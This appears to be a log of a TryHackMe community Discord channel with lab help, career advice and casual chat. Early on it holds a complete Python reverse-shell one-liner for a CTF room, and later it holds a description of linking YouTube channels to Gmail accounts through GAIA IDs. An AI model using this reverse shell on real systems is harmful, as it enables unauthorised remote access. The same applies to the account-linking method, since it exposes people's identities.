#general

1 messages · Page 1792 of 1

topaz sedge
#

I can't help much with that, haven't done the room myself. Sorry.

distant robin
#

I can't use SSH because it requires a password so i have to get information from it using nc and telnet

calm skiff
#

Did you already try to connect pyrat.thm ?

distant robin
#

I connect with telnet no problem but not sure what else I can do with it

calm skiff
#

So, did you get something when you connect ?

distant robin
calm skiff
#

You have to guess what kind of connection it is

distant robin
#

a simple one

calm skiff
#

sorry, what kind of server it is !

distant robin
#

Python

calm skiff
#

right, so, if you can execute python code you can get a revshell

distant robin
#

I'm using this python 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.118.123",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

#

That's why I asked if it should be my VPN IP address or the target machine's IP address because I am not sure if that's even right

calm skiff
#

You have to use your vpn ip adress : only it can be solved by the target.

the problem is that you are trying to invoke python in a python shell. You juste have to execute the python code

distant robin
#

Ok my VPN address

calm skiff
#

BUT, in this room, I think there is some hint in the description

distant robin
sand trench
#

anyone wanna help shadow with a project???

distant robin
#

@calm skiff thank you, I'll try this

twin ridgeBOT
#

Gave +1 Rep to @calm skiff (current: #3216 - 1)

ripe sleet
#

What's the project?

sand trench
#

would recommend helping using a virtual machine as you slightly risk breaking your real machine if you do it on actual hardware
systemd sandboxing of default services on a system + docker + ollama + sddm

#

systemctl list-units --all --state=running
this command lists all running services on your machine

#

systemd-analyze security serviceName
and this command lists its security score

#

we are aiming to get as many ok:s ( i.e in the 2.0-4.0 range ) as possible without breaking normal workflow

#

not gonna post the command to make an override.conf file for a service as you can technically break stuff if you do

west sphinx
#

@sand trench whyre u smart for

sand trench
#

you think shadow is smart?? if so you are clearly mistaken

distant robin
#

@sand trench do you want me to post a screenshot of the above?

sand trench
sand trench
# distant robin I mean of this

eeeh if you run that and share a screenshot it would mostly have the same stuff as shadow unless you have installed a lot of specific software

worldly pollen
#

gm girls

sand trench
#

oh so you are not from finland after all

distant robin
sand trench
# distant robin

yeah that looks like some default ubuntu or mint distros services

distant robin
#

It's on a 2nd SSD so it's separate from my other one

sand trench
distant robin
#

I had to install Cargo for rustscan on it

sand trench
#

which does not have a service listed in there

#

can see that you installed docker though

old canopy
#

i refuse paying for proxifier license

sand trench
old canopy
#

Are you an Initex employee by any chance?

brittle kraken
#

I hate web pentesting so much

sand trench
#

nope

#

just happy you are saving money on not buying something shadow has no clue what it is

#

could shadow look up what proxifier is??? sure
will they do that right now?? probably

old canopy
sand trench
#

ah it is just a proxy app...

#

better off with some free open source thingy for taht

old canopy
#

now

#

find me a reliable working secure and good opensource project doing the exact same thing as proxifier

rapid merlin
#

🖐️😺

old canopy
old canopy
sand trench
#

ah right

old canopy
#

notify me in like a hundred trillion years

#

when you got one

#

proxycap is trash btw

sand trench
#

kinda telling you to do your own research but providing sources for where to find alternatives and info

sand trench
#

relaxed and trying to find interesting youtube videos to watch

sand trench
#

while making an offline copy of the scp wiki limited to the first 10k pages that is linked from main page

gusty inlet
#

Not the place.

sand trench
#

that was quick

#

was just about to send a report message

mellow copper
#

is anyone doing the Huntress CTF?

gusty inlet
#

Last warning, not the place.

ripe sleet
sand trench
#

wow old github looks weird compared today when you are used to how it looks now

old canopy
sand trench
#

ah mostly malware stuffs

#

not super interesting to shadow

old canopy
#

Ah nvm i think socks 5 was supported

sand trench
#

¯_(ツ)_/¯

midnight canyon
#

hi everyone

sand trench
#

ell gniki

old canopy
#

it is registered now anyways

strong fjord
#

To those who've taken SAL1 or PT1, how was it?

distant robin
boreal scarab
#

Please, read the title for the printer

old canopy
#

ink cost 200€

#

WAIT

#

?????

boreal scarab
mossy river
#

ai printer, submit an empty document and it populates for you

old canopy
#

this has to be sarcasm

sand trench
boreal scarab
#

"print me a paper of the history of Japan"

old canopy
#

"print me a 1:1 1$ dollar "

sand trench
#

it is from a 9+ years old video

worldly pollen
distant robin
boreal scarab
#

Oh no no no

old canopy
#

Genuinely concerned on why...

boreal scarab
#

If you don't already hate HP enough.... now would be a great time to pick up that hatred

#

IT'S NOT EVEN JUST THEIR SMART ONES!

old canopy
#

i dont care because printing is bad for trees and i like trees 🙂

sand trench
#

most printers bad

boreal scarab
#

I like printing manuals out. I know, I'm horrible.... but I don't go through so much paper like schools do

old canopy
#

costwise is not amazing tho

sand trench
#

heard good things about brother printers but also heard they had some weird change

boreal scarab
ripe sleet
strong fjord
#

Aight

sand trench
#

meep moops shadow is gonna go for the sleep sloops to the beep boops now

oblique loom
#

🎉

worldly pollen
#

how can help me to find LeakBase onion url

#

nvm I found that

silver sky
#

YouTube is down and ZenDesk is further being exploited

#

The irony being I don't have a discord account linked to this email nor have I ever used front gate tickets

mossy river
#

Someone just messaged me to ask if youTube went down lol

plucky ore
#

so we back to the old server pic

ripe sleet
leaden olive
winged nimbus
boreal scarab
#

Ah yes.... US is banned from downloading Windows 11 ISO... but swap my VPN to Canada and it's just fine...

boreal scarab
# ripe sleet Why're you sad Matt? <:hanaConfused:985699289042940024>
#

They're discontinuing my favorite gun pikachu_cry

quaint fossil
#

good morning guys

grizzled sky
#

so i can't go into details for obvious reasons, but i just submitted my first real world bug bounty!;

fringe nacelle
#

Nice

quaint fossil
#

hello

oblique loom
#

Guys

#

Pokemon Legends

#

Midnight

#

:D

marsh lark
#

hopefully Jabba is asleeeeeeep

oblique loom
#

He Europe

#

So... Maybe

#

Or waking up

marsh lark
#

LOL

dark mason
static smelt
#

hi

#

i completed intro to phishing soc sim and it says completed but progress is at 80%

#

Introduction to Phishing

Soc-sim

Completed
80%

#

......

grim sparrowBOT
#

Done!

marsh lark
wraith jasper
#

What is a tool I can use to remove a .zip file from a .png file? An embedded file that is, 7z is not working because it asks for the password for that zip file which is what I need to crack but I do not want to attempt to write a python script at the moment to initiate the command 7z x <image> and then brute force the password from a list, keep track of where it is at in the list, and reinitiate the connection before attempting the next item in the list

#

?

marsh lark
wraith jasper
#

ye

marsh lark
#

if the zip is in the png

wraith jasper
#

I figured out the tool, I couldn't remember the name earlier for some reason, binwalk

safe heart
#

download the zip on main pc

wraith jasper
#

Hold on, I'll get correct error msg

#

need PK compat. v5.1 (can do v4.6)

marsh lark
wraith jasper
#

png

marsh lark
#

u cant unzip a png

safe heart
#

check metatdata

wraith jasper
#

Nothing in metadata

#

I got this when I used unzip:

Archive:  cutie.png
warning [cutie.png]:  34562 extra bytes at beginning or within zipfile
  (attempting to process anyway)
   skipping: Changed this text.txt           need PK compat. v5.1 (can do v4.6)```
marsh lark
#

then unzip

wraith jasper
#

Ye, I was just showing what I did prior

marsh lark
#

ah

#

oki

rapid merlin
#

🖐️ 😺

marsh lark
wraith jasper
#

365 365.zlib 8702.zip success

gray sonnet
#

@marsh lark what's going on 👀

marsh lark
gray sonnet
#

yes and in general

marsh lark
#

ah

#

nothin much

#

life lol

gray sonnet
#

Makes sense

marsh lark
#

learning some AI stuff now

#

not much difference lol

#

lol

#

my life is booooooooooring

ripe sleet
marsh lark
#

hows urs @gray sonnet

ripe sleet
marsh lark
ripe sleet
sleek hare
#

Gm

ripe sleet
sleek hare
#

Hai

ripe sleet
gray sonnet
#

Very mad and my head hurts lol

ripe sleet
gray sonnet
#

how are you doing today?

ripe sleet
rapid gust
#

hello my slimes

sleek hare
#

Hru?

ripe sleet
ripe sleet
ripe sleet
ripe sleet
rapid gust
#

only if you want to be

ripe sleet
#

Do I get the powers of the MC in the I was reincarnation as a slime story

rapid gust
#

no slime rancher i put you in a cage

ripe sleet
#

I shall escape! Hanapoggies

rapid gust
#

i believe in u'

ripe sleet
#

I will free my fellow slimes, and lead them into the formation of a new nation.

rapid gust
#

do i take this payment program interest free 850 a month

sleek hare
#

I dunno, didn't touch thm for few days

#

Wth this email should mean

ripe sleet
rapid gust
#

let me look for mine i think i did really well

ripe sleet
#

😮

rapid gust
#

awww yeah i did do really well

#

im doing the educational rooms not the hard hacking rooms so i think its cheating

#

i themed my ubuntu today

ripe sleet
rapid gust
#

what do u use dark

ripe sleet
# rapid gust what do u use dark

My main PC currently uses windows 10, but my laptop uses Arch now. Specifically the cachyos that violet put in the chat before

pine bison
#

We use arch btw.

#

ngl, i haven't booted my arch for a while. I stuck to windows 11, kali vm for now

rapid gust
#

i just did a debloated ubuntu instead as a compromise

ripe sleet
#

It's less keystrokes

#

Hyprland is kinda fun though

stiff geyser
ripe sleet
#

If I do move my current PC to linux. I might do KDE plasma as my desktop manager. I mean I'll try installing hyprland, but it's finnicky or so I've heard. If Not I'm gonna switch to kde

rapid gust
#

i watched mr robot for the first time yesterday he was like "a company exec using KDE🙀 "

ripe sleet
#

I mean I could do openbox too, but nah

rapid gust
#

why do i have to submit two credit reports to apply for this school

#

dark do u work

ripe sleet
#

I'm in grad school Hanapoggies

rapid gust
#

what u studying

#

and a masters?

ripe sleet
#

Cybersecurity Hanapoggies

rapid gust
#

nice

ripe sleet
#

Yeah

rapid gust
#

i love the industry sm😭

#

im so grateful i found cyber

ripe sleet
sleek hare
upper umbra
#

Hello yall also excuse my name😭

rapid gust
#

hiiii

#

what everyone up to tonight

sleek hare
#

For some people its early morning

#

xD

rapid gust
#

no that's impossible

sleek hare
#

It is 7am for me

#

Nearly 8

rapid gust
#

you're lying

silver sky
#

Morning THM community any reason why vouchers cant be purchased anymore?

rapid gust
#

gift vouchers?

silver sky
#

Yeah yeah

#

for premium...

rapid gust
#

that's so funny i tried to buy on a couple days ago to gift to someone in here

#

i have no clue but i wasnt able to either!

silver sky
#

Cant post screen shot but yes we cant buy vouchers anymore

#

Any MODS or STAFF on?

sleek hare
silver sky
#

Its 8am somewhere on the planet right

pine bison
silver sky
#

where should i do that?

#

room link?

marsh lark
sturdy sequoia
rapid gust
#

NotLikeThis patch management

marsh lark
teal breach
#

bro w3hats going on bruhhhhhhhh Why vouchers not working anymore this is Insane bro

ripe sleet
#

I wish all of you a wonderful rest of your night/day. See you

queen flare
#

Maybe they plan to open it back

teal breach
silver sky
queen flare
silver sky
twin ridgeBOT
#

Gave +1 Rep to @queen flare (current: #161 - 60)

rapid gust
#

give scorpius +1000 rep

queen flare
#

is tryhackme being slow for u guys

teal breach
neat shoal
#

Is there any legendary pro hacker here who can help me a little?

sturdy sequoia
#

Please don't ask for something illegal

dreamy scaffold
#

-# (nowhere near “a hacker” btw)

queen flare
#

hacker is 0x8 and legend is 0xD
you can't be both at the same time

neat shoal
pine bison
#

ask the feds?

queen flare
dreamy scaffold
#

Guys I recently learned how dark digital forensic is

queen flare
#

nothing dark about it

rapid gust
#

i was gonna say XD

dreamy scaffold
#

Ehh yes there is, the criminal side

rapid gust
#

maybe like actual forensics

#

yeahhhh that side i totally can see being dark

neat shoal
#

My iPhone has gone missing

queen flare
#

if you're talking about things a dfir person might find when investigating, sure but thats not dfir itself being dark

dreamy scaffold
#

the cooperate side of it doesn’t involve crime.

pine bison
#

so what's your point?

sturdy sequoia
queen flare
gray sonnet
gray sonnet
rapid gust
#

what was that

#

is this good

#

or am i a noob

dreamy scaffold
# pine bison so what's your point?

That he’s referring to DFIR while I was talking about a Forensic Investigator, whose role is versatile. If I were talking about DFIR then would’ve just said that lol

rapid gust
#

are you a forensic investigator

pine bison
#

👍

dreamy scaffold
rapid gust
#

i do a little bit of forensics mainly for phishing emails its prob my fav part of the job

#

I love DFIR man

#

You're gonna have a bunch of fun 🙂

marsh lark
neat pond
#

GM yall

slow cloud
#

mornin

whole rapids
#

chill

marsh lark
#

Jabba, don't tell me you only slept 4.5 hours

#

-# I saw you were "idle" 4.5 hours ago

neat pond
marsh lark
neat pond
fervent rune
#

hii

#

i want to start my hacking journey what will be my roadmap and how to start hackin g

worldly pollen
#

gm

#

girls

marsh lark
#

girls?

fervent rune
#

ohk i readi it

#

but

worldly pollen
marsh lark
worldly pollen
#

hmm thats wierd

marsh lark
fervent rune
#

try hack me website learning content and labs are free ??

marsh lark
#

around 60% of rooms are free

rapid merlin
fervent rune
#

if i want to only use free labs then i can learn complete hacking ?

sturdy sequoia
worldly pollen
fervent rune
#

ok

marsh lark
#

it is also key that you probably won't learn everything through one site

#

while using tryhackme, do your own research

fervent rune
#

such like i want to hack any website in form of ethical hacking part not any type of harm

#

then free labs are enough ??

rapid merlin
fervent rune
#

ohk

rapid merlin
#

thats how you call it 'ethical'

fervent rune
#

you can understand like my website

marsh lark
fervent rune
#

and i want to hack it

marsh lark
#

(better if you can get premium, but free rooms are great too)

marsh lark
fervent rune
#

todays i start offesive security part and when i started it mechine not opening

marsh lark
#

like is it hosted on aws for example?

fervent rune
#

like host vercel

#

vercel bro not as

#

aws

marsh lark
#

because technically they are hosting it

fervent rune
#

ohk

marsh lark
#

but this will be very tricky, because you need a contract as well

#

I'm not exactly sure how it works in this type of scenario, but you will need to get permission from them

fervent rune
#

i want to share a s

#

s

#

but i'm not able to it

marsh lark
#

you gotta /verify

sharp citrusBOT
fervent rune
#

ohh

sturdy sequoia
marsh lark
fervent rune
#

how to start

#

and which rooms

sturdy sequoia
#

Have a look around. Try it out.

fervent rune
#

i mean

#

can you explain me

#

how to start first

sturdy sequoia
#

It's pretty basic. I'm not going to guide you through it step by step

marsh lark
rapid merlin
marsh lark
#
  1. the "Roadmap" section contains the roadmap (which also includes premium rooms), which you can follow if you want to
  2. Modules are groups of rooms that are about a specific topic
  3. Walkthroughs are rooms that teach you something, which you can sort by newest, etc.
  4. Challenge rooms (which you can find my clicking Practice) are rooms you can test your skills on
fringe nacelle
rapid merlin
fervent rune
#

tru hack me vs hack the box which is better ??

#

i want to some idea

topaz sedge
#

HTB

sturdy sequoia
#

Thm is more beginner friendly

topaz sedge
#

THM is for beginners but after some foundation building, go to HTB

#

HTB gives you a more realistic idea as to how real life pentesting is like

marsh lark
#

I'd recommend starting with THM

fervent rune
#

htb rooms are free ??

fringe nacelle
#

HTB is for when you actually know how to do stuff without guidance.

fringe nacelle
fervent rune
#

ohh

marsh lark
topaz sedge
#

you have write ups

fervent rune
#

i think htb is advance version of thm

topaz sedge
#

and video walk throughs

fringe nacelle
marsh lark
topaz sedge
fringe nacelle
#

He asked free lol

marsh lark
#

learning is academy, no?

topaz sedge
#

i have VIP+ in HTB so i just solve both retired and active machines

topaz sedge
fervent rune
#

ohk

topaz sedge
#

academy also requires a subscription

#

labs also requires a subscription

fringe nacelle
marsh lark
stiff geyser
marsh lark
topaz sedge
#

labs is only machines

#

academy is learning material

fringe nacelle
#

I know homie

marsh lark
topaz sedge
#

yea

#

hey'

#

lmao

fringe nacelle
#

Wassup lol I just lurk here

topaz sedge
#

how you doing

fervent rune
#

anyone know about how to do real life hacking like i want to crack a password then you all are able to do ?

fringe nacelle
#

Finishing up work so bored at the moment.

topaz sedge
#

understandable

#

im doing a machine rn

stiff geyser
topaz sedge
#

and tired

marsh lark
sturdy sequoia
topaz sedge
fervent rune
#

yeah

#

i want to exp on my paltform

#

not any extrenal website or 3rd party applications

topaz sedge
#

start with THM
build a foundation
move over to HTB

fringe nacelle
#

@marsh lark the best way to abuse academy is through their student plan. You can get tier 1-2 modules free (Yes they give you cubes when you complete them) so you can accumulate a stockpile of cubes for some of the higher tier content, but obviously it won't last long.

fringe nacelle
marsh lark
#

luckily, I'm a student for like 8 more years kekw

fringe nacelle
#

I'm curious on how long student emails even last for.

marsh lark
slow cloud
#

oh lawd

marsh lark
#

I just started high school, so

topaz sedge
#

bro is going to type a promotion message

slow cloud
#

chatgpt please give me a promotion message

#

and then bro will paste it

pine bison
marsh lark
pine bison
#

But for beginners, thm is very super duper friendly

fringe nacelle
#

Ermah gawd is that a hot chick? 😻

I'll surely fall for your invite ms.mcc27jq9m01l8s7 what a lovely name 😻

slow cloud
#

for beginners i can recomend thm

pine bison
#

yes.

marsh lark
pine bison
#

its too text heavy

fringe nacelle
#

Ngl I stopped at this level on thm and jumped to HTB

pine bison
#

I started htb after finishing jr pt and some portswigger module/ labs

fringe nacelle
#

Ooooo nice

pine bison
#

also PicoCTF challenges are very good

fringe nacelle
#

This month is my last month of college, so I can finally do more with my time prayge

marsh lark
#

soon, hopefully

fringe nacelle
marsh lark
#

which I can use my student email to get what 3 months LOL

fringe nacelle
#

If you ever need box guidance check out ippsec it's either 1 p or 2

#

But you'll be fine

marsh lark
#

I just realized how OP this is

#

altho, I'm sticking with THM

rapid merlin
#

would thm’s red team path alone train me to OSCP

stiff geyser
marsh lark
#

with HTB

#

too expensive

#

THM is perfect price

rapid merlin
pine bison
plush needle
#

You have not fully advertised any other discord yet, but has a heads up, please do not do so as this might get you removed from the server 🙏

stiff geyser
sturdy sequoia
topaz sedge
#

did it

stiff geyser
topaz sedge
#

took me few hours of crying but okay

#

solved it

plush needle
sturdy sequoia
pine bison
fringe nacelle
marsh lark
pine bison
#

I want me some ProLabs

#

I wish thm have more network labs.

topaz sedge
#

now i want to sleep

stiff geyser
marsh lark
#

-# altho they do give exam vouchers per year

#

but even the monthly ones, goodness

stiff geyser
#

But i guess it isnt if a company is paying for you or youre in the industry and rich

marsh lark
#

THM give access to all rooms for WAY less

stiff geyser
#

Yeah and you have to complete the full path for the exam

brazen crane
#

Hey everyone hope all is good, is anyone else having issues with the Osquery room? I have 2 questions that won't mark as correct when I know the answer is correct

brazen crane
fringe nacelle
#

Ngl the only thing I like from THM is the Christmas event they do for 30ish days. Can't remember the name

fringe nacelle
#

Yee

marsh lark
#

me excited for both AoC and AoC LOL

brazen crane
#

Has there been sites maintenance, have encountered several issues from losing room points to a demotion from diamond to bronze than back to diamond missing all points?

marsh lark
#

we want less bugs lol

brazen crane
#

Ah OK probably explains the room bug as well kekw

neat pond
#

he just search for easy rooms to get more XPs damn mann

#

5840 he just wanna be the best at Xp not at cybersecurity

#

but he is at Ruby league lol

brazen crane
#

Fight fight fight lol

grim widget
marsh lark
#

you can also check their room history and see in some cases (had someone solving multiple easy rooms in 2-3 minutes each)

neat pond
neat pond
#

thanks for explaining @marsh lark

twin ridgeBOT
#

Gave +1 Rep to @marsh lark (current: #28 - 390)

marsh lark
neat pond
fringe nacelle
#

Does thm even ban cheaters Hmmmm

marsh lark
#

they just leave the account but doesn't make them accessible in any way

fringe nacelle
#

That's nice atleast

neat pond
fringe nacelle
#

Well of course

#

They've been a thing since the first game was made lol

neat pond
tired wolf
marsh lark
#

but gosh make it more affordable lol

tired wolf
#

i’ve known internships that offer htb subscriptions

marsh lark
#

that is true

tired wolf
#

hell, one place even offered oscp

marsh lark
#

what the

#

well, I guess they can offer a lot of certs

#

but for interns? crazy

tired wolf
#

benefits them, if anything

marsh lark
#

true

tired wolf
#

the intern would continue working with them

#

and the certificate really just proves his worth

marsh lark
#

and become a full-time employee in the future?

tired wolf
#

yeah

marsh lark
#

-# THM, hire me

tiny wraith
#

Hey guys I've completed all google cybersecurity certs now wondering how to move forward

#

Offensive?

tired wolf
#

up to you

tiny wraith
#

Like what am I suppose do

#

What would you do

tired wolf
#

up to you

tiny wraith
#

If you were in my place

tired wolf
#

im not interested in offensive security

#

so i wouldnt do that

tiny wraith
#

Okay

#

But if I want to be in offensive

#

Like what should I really do now like what the next step on ladder

tired wolf
#

rate your current mastery in offensive security

tired wolf
tiny wraith
#

Haha

tired wolf
#

i wish it’d be that easy

#

but thats not cyber

tiny wraith
#

Should I do try hack me ? And networkings and portswigger and all

#

Bug bounty

tired wolf
#

if your end goal is bug bounties

#

focus on web penetration

north steeple
#

hello guys

sturdy sequoia
marsh lark
tiny wraith
#

I wanna land job

tired wolf
fringe nacelle
fringe nacelle
#

Shit is insane lol

tiny wraith
#

Like I have linkedin too I have google certs too i

tiny wraith
#

Now

#

Phew

tired wolf
tiny wraith
#

Should I apply for soc analyst

#

As

#

Starter

fringe nacelle
tired wolf
#

lunch interviews are cursed

#

had one once

#

guy was just munching

#

😭

fringe nacelle
#

Oh damn, my guy couldn't stop talking

#

Like I barely had a chance to chime in lol

fringe nacelle
tired wolf
#

either aussie or florida

north steeple
fringe nacelle
#

Florida

frozen gull
north steeple
#

i see

#

chat died?

jagged igloo
#

no gif perms 💔

sturdy sequoia
sharp citrusBOT
sleek hare
marsh lark
#

@gusty inlet you ready for one more?

dreamy scaffold
# rapid gust I love DFIR man

I feel you 🤝

At my induction two lecturers gave us a brief insight on their pedagogy, so they chose a task that involved analysing an email of a CEO. I think the salary data sheet was leaked to their competitor.

#

It was fuun ngl

ashen cape
#

Finally!

rotund summit
#

im on ruby league

#

the first guy is 12648 points

#

im second one

3174 points cri

marsh lark
sharp citrusBOT
#
TryHackMe's Email

TryHackMe's support email address.

marsh lark
#

be very specific tho

#

like which week it was, what league, what their username is, etc.

#

@mossy river does Vmware normally use more storage when it is running?

#

cuz when it isn't running, it seems to be at around 20+ GB, but now it is almost 40 GB

winged nimbus
zealous shell
#

What's the next league after ruby? I wanna see how it looks like

rotund summit
rotund summit
marsh lark
marsh lark
#

they will investigate on their own

#

for cheating

winged nimbus
rotund summit
marsh lark
rotund summit
twin ridgeBOT
#

Gave +1 Rep to @marsh lark (current: #28 - 391)

marsh lark
#

I've got 3.26 TB left LOL

zealous shell
tired wolf
marsh lark
tired wolf
#

how is the virtual machine configured

#

pre alloc

marsh lark
tired wolf
#

or dynamic

marsh lark
marsh lark
#

yup, so just shut down the machine

#

and it went from 39GB to 23GB

#

the size of the folder containing the VM I mean

rotund summit
tall kiln
#

What does this mean ?

rotund summit
#

for 30min only

tall kiln
rotund summit
marsh lark
#

@gusty inlet ready

gusty inlet
rotund summit
marsh lark
winged nimbus
#

i could join but i should get sleep

marsh lark
winged nimbus
marsh lark
winged nimbus
marsh lark
#

DKob is solving a hard room in thm

#

called ledger

winged nimbus
#

is it red or blue

marsh lark
#

red

winged nimbus
#

alr

marsh lark
#

AD

rose bone
#

sup

marsh lark
#

@mossy river @gusty inlet the trio LOL

winged nimbus
rose bone
#

sup

queen flare
gusty inlet
rapid merlin
mossy river
rapid merlin
#

I lose connection

steel aspen
#

Entire distro got corrupted, guess I'm dumb for going straight to an advanced distro, and lost most of my files. Lucky I had some backed up. Mint Cinnamon for me now hahah. Feels like a different distro so far though. But I get to go through the process of downloading and installing all the tools manually and probably doing some configuration.

green zealot
#

Guys, how can I learn topics like tracing and findings

sturdy sequoia
#

tracing and finding what?

rapid merlin
#

information gathering niches

slow cloud
#

Vulnerability finding

#

Its quite vague

queen flare
#

data centers in india are subjected to a law, by which they are forced to keep logs along with user information for 5 years at least, and the government can ask for those logs anytime.

#

if the data center is located in mumbai, i assume tryhackme would do the same?

mossy river
#

that's up to the owner of the data center to maintain, not organisations that use it

#

Unfortunately I cannot discuss TryHackMe infrastructure for security reasons, if you have any concerns I would advise you to contact support 🙂

queen flare
twin ridgeBOT
#

Gave +1 Rep to @mossy river (current: #6 - 1825)

dark mason
#
b = a - b;
a = a - b;```
#

My CS teacher used this today

#

I am deeply disappointed

dreamy bronze
#

what is that

dark mason
dreamy bronze
#

dam

#

lmao

#

why would they use that

mossy river
sharp scarab
#

hey guys, is there a problem to the soc simulator?

#

i saved my progress and now I went back to it, but when I click on dashboard, the page goes white and nothing else happens

mossy river
sharp scarab
#

paid premium account, phising unfolding 2

mossy river
#

You will need to open a ticket with support

dark frost
dark mason
sharp scarab
#

weird, can't finish the simulator

#

submitted a ticket on the site

mighty granite
#

when i terminate the machine i don't have target ip

#

i can use it

#

it just disappear

#

like it crushed and after refreshing the page i terminated again

#

and there's nothing

slow cloud
#

you stop the machine

#

thus the IP gets removed

mighty granite
#

i'm confused

slow cloud
#

about?

mighty granite
#

oh

#

i said everything wrong lmao

#

i meant something different

#

sorry eng not my first

slow cloud
#

thats okay

mighty granite
#

well...it terminated by themself

#

then i refresh page

#

i start the attack box

slow cloud
#

the attackbox or the other machine

mighty granite
#

and there's no ip

lunar jolt
#

yo any pro expereinced hackers in here?

mighty granite
#

attack box

slow cloud
sturdy sequoia
mighty granite
#

omg i forgot i have to start machine as well

slow cloud
mighty granite
#

jeez

#

thanks

slow cloud
#

yesss you need to start them both

#

so you can remote desktop from the attackbox into the other machine

lunar jolt
slow cloud
#

i just told you that im experienced

#

so yeah you may know

lunar jolt
#

ethical hacker?

slow cloud
#

well yeah, we only do ethical things in this server

lunar jolt
#

ovsly yeah but working for someone

slow cloud
#

i have worked for someone

lunar jolt
#

I wanted to ask like how we can look out for jobs as an ethical hacker

slow cloud
#

Do you have experience in IT, certifications, maybe some projects

lunar jolt
lunar jolt
slow cloud
#

i think your best bet would be to type out your question, what kind of experience you got etc and post that in #cyber-and-careers people there are more knowledgeable and will be a better guide if they can help

twin ridgeBOT
#

Gave +1 Rep to @slow cloud (current: #54 - 196)

queen flare
#

@cloud quiver i do the same thing sometimes for maintaining streak xD

gusty inlet
mighty granite
#

i'm going insane why attack box works so bad

#

i need to terminate it and start several times to make it work

swift mulch
#

tryhackme is teaching me and showing my flaws now wthh

dreamy bronze
#

😂

frozen gull
#

guys

#

what do u think of

#

klcp

#

is it good or

gusty inlet
#

Skip.

#

Mainly managing packages.

#

You don't need a cert for Linux commands.

frozen gull
#

what should i go for

barren kraken
#

Hey

marsh lark
#

@mossy river I forgot to tell you, you know the new beta VM region in Asia? during today's event, I launched my machine in that beta region before the event started, but when I tried an nmap scan (at this point, DKob's stream started and he was also doing an nmap scan), it showed no ports open (without the -p-, so only the top 1000 ports, but still). When terminated the machine, changed the VM location to US East (N. Virginia), that machine did work normally and showed all ports that were supposed to be open

#

just wanted to let you know

barren kraken
#

Any have free web pentesting learning resources for get a job

#

Some one here

safe oxide
#

Echo branding removed lol?

barren kraken
frozen gull
frozen gull
#

ok

barren kraken
reef mountain
#

hi

#

new here

#

if i want to ask tips

#

anyone know where to ask

tawdry fern
#

support -> room-hints

reef mountain
#

but ok

tawdry fern
#

wdym?

frozen gull
#

ah

#

Kmap sux

#

its brain fuyggin me

reef mountain
queen flare
#

is this only for specific rooms

tawdry fern
#

Had these pop up after certain challenges

naive crest
#

hi, I've recently been crawling web because few osint people mentioned that there is a possiblity to find email from youtube account. Found another mention in reddit but could not confirm this method. Has anyone done it before?

YouTube and most Google services uses a special internal identifier known as the GAIA id. When you enter a random Gmail on the login page it will also show the GAIA id in the HTML response. People can theoretically build a list of GAIA IDs from gmails and tie them to the same GAIA ID of YouTube channels to figure out which channel is linked to which Google account. Every Google service tied to a Gmail will always have the same GAIA ID. That means Google drive as well.

slow cloud
#

why would you need to find a email based on youtube account

naive crest
slow cloud
#

no clue

silver sky
loud marlin
feral whale
# naive crest like most of us here learning the offensive side to protect from it, this is the...

I can confirm, that this method indeed exists but leaking it would cause more problems than solving. Its so unknown that i doubt u need it to protect urself or others from it. The only reason u need this information for is to hijack someones account and not to protect urself.

Even if u knew the method, you couldn‘t do anything to protect urself because the Bug thats being abused for this certain method has to be fixxed by Google itself.

sleek hare
#

hm

#

hai chat

feral whale
#

The Truefruits ambassador is bsck

#

Hello

glossy holly
#

who know discrete math?

#

who can help me

#

please

naive crest
marsh lark
sand trench
glossy holly
feral whale
#

Good afternoon

marsh lark
glossy holly
#

just discrete math

marsh lark
#

but like why

loud marlin
# sand trench neato... looks like something similar to chadwm for dwm but for dwl instead

This is a quick and painless guide on getting MangoWC up and running with sane config options, and how to customize it yourself. This compositor is a well designed fork of DWL, with much more features, and no recompile needed.

Written Article: https://www.tonybtw.com/tutorial/mangowc/
Repo: https://github.com/DreamMaoMao/mangowc
*My Mango C...

▶ Play video
marsh lark
#

why are u asking @glossy holly

loud marlin
loud marlin
#

wut wut

sand trench
feral whale
#

Guys I got a spare laptop would u rather use a machine exclusively for Cyber Security or keep it in a VM?

#

Well in my case a docker

glossy holly
#

i just think some people know discrete math in this chat

marsh lark
ivory trench
#

Discrete math is pretty broad. Do you have something specific you are looking to know?

silver sky
#

What is discrete maths? What does maths have to hide?

digital estuary
#

hi everyone

long lotus
#

i love this song (see my profile)

digital estuary
glossy holly
digital estuary
#

#freethedecimals

silver sky
digital estuary
ivory trench
#

You should check out TrevTutor on YouTube

glossy holly
#

so hard for me

digital estuary
#

GOD I hate math problems where you have to prove something

marsh lark
silver sky
#

just don't do maths, I've never needed it

keen light
#

bro i dont think i have done a math problem that was just a raw computation in like 5 years its just proof

glossy holly
digital estuary
glossy holly
rapid merlin
#

For some reason when I do thm rooms I cant access websites remote machines why ? On my vm

mellow narwhal
#

@cloud quiver / @gusty inlet (or any staff member available)
May I advertise an upcoming CTF here? Starts in an hour, so it's a last minute push for whoever is interested.

marsh lark
tired summit
#

How do i hack

tawdry fern
#

og math heads representing

mellow narwhal
marsh lark
keen light
tawdry fern
#

answer = easy4

digital estuary
gusty inlet
tired summit
marsh lark
tired summit
#

Oh..

#

Shhh

#

No one has to know

feral whale
tired summit
marsh lark
#

is it really yours?

#

or roblox's?

digital estuary
tired summit
#

Ts mine

feral whale
marsh lark
#

in theiry, to "get back your acount", you have to hack in roblox

#

technically

#

which is illegal

feral whale
#

idk about the laws in yout country

marsh lark
#

without specific permission

ripe sleet
marsh lark
digital estuary
#

Thats like me forgetting my laptop in a school then I decide to break into it late at night

marsh lark
feral whale
#

nothing illegal

marsh lark
#

that if I lose an account because of phishing for instance

#

I can do everything I can to get that account back

#

even if it means hacking into the company?

feral whale
#

the easiest way is by court

digital estuary
#

"my goodness! let me go sue this company because i lost my account"

#

really?

marsh lark
#

well, that is a legal way

feral whale
tawdry fern
#

let's sue the company

digital estuary
#

the company is not yours

feral whale
#

and the account belongs to the person

marsh lark
digital estuary
#

the account is not yours; the account is company property

ripe sleet
feral whale
#

the company can write in their tos whatever they want

#

if you live in germany ur data belongs to u

marsh lark
#

that changes things

mellow narwhal
tawdry fern
#

who's property is the account by holy law though? that's the highest instance of law there is

feral whale
marsh lark
#

what if the creds are changed?